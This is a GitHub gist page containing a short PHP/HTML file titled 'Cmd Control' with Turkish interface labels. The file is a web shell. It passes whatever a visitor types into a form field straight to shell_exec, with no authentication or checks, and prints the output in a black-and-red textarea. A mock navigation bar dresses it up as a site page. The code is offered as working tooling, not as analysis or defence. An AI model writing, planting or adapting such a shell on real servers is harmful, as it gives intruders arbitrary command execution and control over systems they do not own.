Skip to content

Instantly share code, notes, and snippets.

@xainntht
Created November 17, 2020 22:12
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save xainntht/57b7f16ce279d067f878443c15f0fffd to your computer and use it in GitHub Desktop.
Save xainntht/57b7f16ce279d067f878443c15f0fffd to your computer and use it in GitHub Desktop.
<!DOCUTYPE>
<html lang="tr-TR">
<head>
<title>Cmd Control</title>
<meta charset="UTF8"/>
<style>
.a a{
style="font-size:20px;
background-color:black;
color:red;resize:none;
width:500; height:50;
font-weight: bold;
text-decoration: none;
}
.a td{
style="font-size:20px;
background-color:black;
color:red;resize:none;
width:500; height:50;
font-weight: bold;
text-decoration: none;
text-align:center;
}
.c::-webkit-scrollbar {
width: 30px;
}
.c::-webkit-scrollbar-track {
background: black;
}
.c::-webkit-scrollbar-thumb {
background: red;
}
.c::-webkit-scrollbar-thumb:hover {
background: green;
}
</style>
</head>
<body bgcolor="black">
<center>
<table class="a" width="1010" height="50" border="1"><tr><td><a href="#">Anasayfa</a></td><td><a href="#">Geri Bildirim</a></td><td><a href="#">Mesaj</a></td><td><a href="#">Bildirim</a></td><td><a href="#">Çıkış</a></td></tr></table>
<form action="" method="post">
<pre>
<textarea class="c" style="font-size:20px;background-color:black;color:red;resize:none; width:1000; height:400;" disabled><?php
if($_POST){
$kod=$_POST['kod'];
$çıktı = shell_exec($kod);
echo "$çıktı";}
?></textarea></pre><br>
<textarea style="font-size:20px;background-color:black;color:red;resize:none; width:1000; height:100;" name="kod" required></textarea><br><br><button style="font-size:20px;background-color:black;color:red;resize:none; width:500; height:50;">Çalıştır</button></form>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment